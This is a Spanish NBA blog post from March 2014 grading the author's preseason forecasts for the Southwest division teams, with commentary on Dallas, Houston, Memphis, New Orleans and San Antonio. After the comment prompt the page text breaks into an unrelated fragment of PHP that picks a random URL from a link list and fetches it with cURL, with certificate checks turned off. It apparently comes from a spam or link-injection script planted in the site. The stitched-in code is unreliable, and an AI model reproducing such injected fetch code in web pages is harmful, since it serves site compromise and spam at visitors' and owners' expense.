Revisando pronósticos: Southwest

03 de March de 2014 por TheDeerHunter

DALLAS MAVERICKS

Pronóstico Septiembre 2013: 11º equipo del Oeste (37-45)
Probabilidad de acierto: Nula
Calificación pronóstico: D-

Notable temporada del nuevo all-in de Cuban. Calificábamos a la plantilla de descompensada, con muchas carencias defensivas, débil físicamente y de difícil ensamblaje. Añadiría también demasiado veterana, aunque ese factor no les impidió antaño alcanzar el éxito, y con demasiadas caras nuevas que tampoco suele beneficiar un buen tono colectivo a corto plazo. Con ellos hubo cierta diversidad de opiniones, pero me atrevería a decir que con los argumentos en la mano y comprobando el nivel de la conferencia hubiera sido una apuesta de alto riesgo reservarles plaza de playoffs.

En lo que se refiere al aspecto defensivo nos acercamos bastante pero enc ualquier otro aspecto han superado totalmente nuestras expectativas. En ocasiones se nos olvida que “donde hay sí se puede sacar” y es que este equipo siempre tuvo buenos mimbres. Bastante respetados por el factor lesión, Carlisle ha dispuesto de una rotación de 10 hombres que han rendido a gran nivel. Han ido de menos a más, asentando gradualmente las nuevas piezas. Todas las incorporaciones han encajado casi a la perfección en una filosofía puramente colectiva. Podíamos intuirlo con gente como Calderon, Blair o Dalembert pero ha sido Monta Ellis quien más ha sorprendido en ese aspecto.

En cualquier caso si a alguien va unido el destino de la franquicia es a Dirk Nowitzki. Al contrario de lo que muchos creíamos el alemán ha vuelto a destapar el tarro de las esencias acercándose bastante a lo que era. Si Dirk mantiene nivel all-star los Mavs suben un escalón en las quinielas. El problema es que a pesar de lo bien que lo están haciendo no se aseguran los playoffs, ni mucho menos llegar lejos en las eliminatorias. Llegan de tapados y si se da el caso serán un rival peligroso. Poco más podemos atrevernos a predecir tras nuestro desacierto inicial. 

HOUSTON ROCKETS

Pronóstico Septiembre 2013: Unas 50/52 victorias. Cuartos o quintos del Oeste. Su tope será segunda ronda aunque los veo cayendo a las primeras de cambio.
Probabilidad de acierto: Media
Calificación pronóstico: C

Profunda disección la que les hicimos en Octubre. No les pusimos mal, aunque dudábamos de su capacidad inmediata para competir en los que parecen que serán los playoffs más duros que recordamos en el Oeste. Los Rockets están rindiendo un punto por encima de lo que esperábamos, manteniendo las gratas sensaciones del curso anterior y con Howard plenamente integrado. Están consolidados en la parte alta del cuadro y desplegando un baloncesto de gran nivel ofensivo.

De nuestro análisis me llaman la atención varios detalles. Se apuntaba que tendrían problemas en la dirección y, a pesar de Howard, también en la defensa. Así ha sido exáctamente. Por ello decíamos que se verían obligados a jugar muy rápido para sorprender a sus rivales. La adaptación al ritmo de playoffs aún está por ver, así que de momento dejaremos esa cuestión en cuarentena a pesar de que tiene todo el sentido del mundo.

Sin duda la llegada de Howard ha dado un plus al equipo aunque la mejora no ha sido del todo completa porque ha supuesto el ostracismo para Omer Asik que el año pasado fue clave. La lástima es que tampoco han encontrado una salida óptima para ambas partes y tendrá que aguantar un tiempo en la nevera. El otro gran factor en la mejoría ha sido la consolidación de Terrence Jones como titular de garantías, cuestión que ya intuíamos fundamental, en la posición a priori peor cubierta del equipo.

Los Rockets se han movido poco pero bien al cierre del mercado. Traspasaron a Aaron Brooks, que ya no pintaba nada teniendo a Beverley y Lin por delante a cambio de Jordan Hamilton que, como dijimos en su día, encaja perfectamente en la ideosincrasia de este proyecto.

Quedan muchas cuestiones por resolver en Houston antes de confirmar si íbamos o no bien encaminados. La hora de la verdad serán las eliminatorias. Ahora mismo esa primera ronda que firmábamos supondría una importante decepción.

MEMPHIS GRIZZLIES

Pronóstico Septiembre 2013: TOP-4 del Oeste (52-30). Segunda ronda de Playoffs.
Probabilidad de acierto: Baja
Calificación pronóstico: D

Ni en nuestras peores pesadillas les veíamos a estas alturas de curso en la cuarta plaza de la Southwest y padeciendo lo que no está escrito para meterse en zona de playoffs. Situación que ha aprovechado Mr. Hollins para meter el dedo en la yaga siempre que ha podido. Fue uno de los principales protagonistas de la mejor temporada de la franquicia y  premiado con una patada donde la espalda pierde el nombre.

A David Joerger le costó hacerse con las riendas del equipo así como recuperar sus señas de identidad y cuando el equipo ha comenzado a carburar tampoco se ha aproximado a la brillantez del curso pasado. Lo fácil sería señarle con el dedo como principal responsable, pues era la principal novedad en un equipo que se alteró muy poco. También sería absolutamente injusto endosarle toda la culpa.

Además del manido aumento del listón en la conferencia, y en especial en esta “división de la muerte”, los Grizzlies han sufrido particularmente problemas de lesiones y de forma física. Exceptuando a Mike Miller, que ha disputado todos los partidos, el resto se ha perdido un buen número de ellos. Marc, Pondexter, Allen, Conley… la columna vertebral del equipo se ha perdido casi la mitad de la campaña. Además, exceptuando a Conley y algunos secundarios (James Johnson, Leuer, Koufos y Ed Davis) el resto ha rendido muy por debajo de lo que se esperaba de ellos. Marc y Zach no causan los estragos que esperábamos, Prince es un ex jugador en activo, Bayless que tantas alegrías les dió en el pasado, se arrastró todo el campeonato hasta que terminó traspasado…

Aún tienen alguna opción de corregir su campaña e inquietar a algunos en las eliminatorias pero lo cierto es que una primera ronda con desventaja campo en el Oeste es un escollo muy difícil superar. La imagen que han dejado durante la mayor parte del curso tampoco invita a ser optimistas.

NEW ORLEANS PELICANS

Pronóstico Septiembre 2013: Alrededor de 35 victorias. Últimos de la Southwest.
Probabilidad de acierto: Alta
Calificación pronóstico: A-

Meritoria campaña la de los Pelicans, mucho más de lo que parece. Prácticamente clavarán nuestro pronóstico, que no era especialmente generoso e incluía la cuchara de madera de la división. Además se mueven por la mitad baja en todas las categorías medibles. Sin embargo, volvemos a insistir en que ésta es probablemente la división más dura desde donde alcanza la memoria y en que también les han afectado con virulencia todo tipo de infortunios. A pesar de todo han dado tanta guerra como esperábamos, así que es de suponer que con toda la artillería operativa podrían haber ganado un buen número de partidos más.

Curiosamente las lesiones no han llegado de sus “sospechosos habituales” Tyreke Evans y Eric Gordon, quienes apenas se han perdido una decena de partidos entre ambos. En cambio sí han pegado con fuerza a dos piezas fundamentales como Holiday y Anderson. Menudo año más trágico para éste último.

Quién sí ha cumplido sobradamente las expectativas ha sido Anthony Davis, all-star en su segundo año firmando numerazos de ensueño. Está claro que alrededor suyo se puede construir algo grande. Marcará una época si la franquicia está acertada rodeándole.

Aunque queda un pequeño poso de decepción por no haberse acercado más a playoffs no debemos olvidar cuales eran los objetivos originales. No eran otros que poner los cimientos de un proyecto ambicioso en los próximos años. La base del equipo está muy bien hecha. Ahora sólo falta acertar con los complementos. El año que viene se les exigirá mucho más.

SAN ANTONIO SPURS

Pronóstico Septiembre 2013: 6º-8º del Oeste (45-50 victorias). Primera ronda.
Probabilidad de acierto: Baja
Calificación pronóstico: D

Esta gente debe de haber firmado algún tipo de pacto con el Demonio. Es absolutamente incomprensible que año tras año (17 ya de Popovich) sigan siendo competitivos con un núcleo tan súmamente veterano y peleándose con proyectos verdaderamente temibles. Los aficionados más jovenes no conocen una postemporada sin los Spurs.

Popovich, Duncan, Manudo, Diaw, Parker… se empeñan en demostrarnos que ellos no están sujetos a las leyes de los hombres. Nuestra cabeza nos dice que nada es eterno, ni siquiera ellos. Es la trampa en la que caemos una y otra vez cuando no les damos el crédito que merecen. Parece imposible que sigan en la brecha. Uno de los secretos de su éxito es lo que popularmente se conoce como “jugar de memoria”. Han conseguido tal nivel de excelencia en sus sistemas que sin contar con un físico puntero y desplegando un alto ritmo ofensivo son capaces de defender como las versiones más rocosas de si mismos. Baloncesto total. Otro de los grandes secretos es el aprovechamiento de la plantilla. No logramos comprender cómo consigue Popovich involucrar simultáneamente a tanta gente. Hasta 12 hombres están preparados en todo momento para rendir de forma óptima y ninguno de ellos disputa más de 30 minutos por partido.

Nos hemos quedado con las ganas de ver el 15º all-star de Duncan. La competencia en su posición era atroz pero algunos opinamos que lo merecía más que otros. Al final se optó por llevar a Parker cuya regular no está siendo tan brillante como en otras ocasiones.

Soñar es gratis y algunos lo hacemos con otra oportunidad más en la final y con Duncan llevándose otro MVP de las finales para su casa. Hay tantas posibilidades de que esto ocurra como de que nosotros clavemos nuestro pronóstico.

Esta entrada no tiene comentarios... pero tú puedes ser el primero.

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>